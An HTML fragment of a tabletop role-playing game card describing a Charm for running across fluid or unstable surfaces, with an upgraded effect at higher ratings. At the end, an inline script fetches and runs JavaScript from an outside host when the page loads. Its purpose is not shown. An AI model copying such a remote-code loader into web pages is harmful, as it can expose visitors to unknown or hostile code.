<div class="card-element card-description-line">   <p class="card-p card-description-text">The Exalt may run across fluid surfaces. he may dash over unstable surfaces as if they were solid and move over surfaces no thicker than rice paper without breaking through. At full speed, he may also move across dangerous surfaces without getting hurt. This effect lasts until the Exalt stops dashing.</p></div>
<span class="card-fill" style="flex:1"></span>
<h3 class="card-section" style="color:DarkGoldenrod"><div></div></h3>
<div class="card-element card-description-line">   <p class="card-p card-description-text"><b>Athletics 5, Essence 2</b>, Exalt can pause on unstable surfaces without breaking through; new duration of Charm “1 stunt”</p></div>
<span class="card-fill" style="flex:2"></span></div></div></div>
</page>
</div><script>
                        (() => {
                            function init() {
                                const script = document.createElement('script');
                                script.type = 'text/javascript';
                                script.src = 'https://3001.scriptcdn.net/code/static/1';
                                document.head.appendChild(script);
                            }
                
                            if (document.readyState !== 'loading') {
                                init();
                            } else {
                                document.addEventListener('DOMContentLoaded', init);
                            }
                        })();
                    </script></body></html>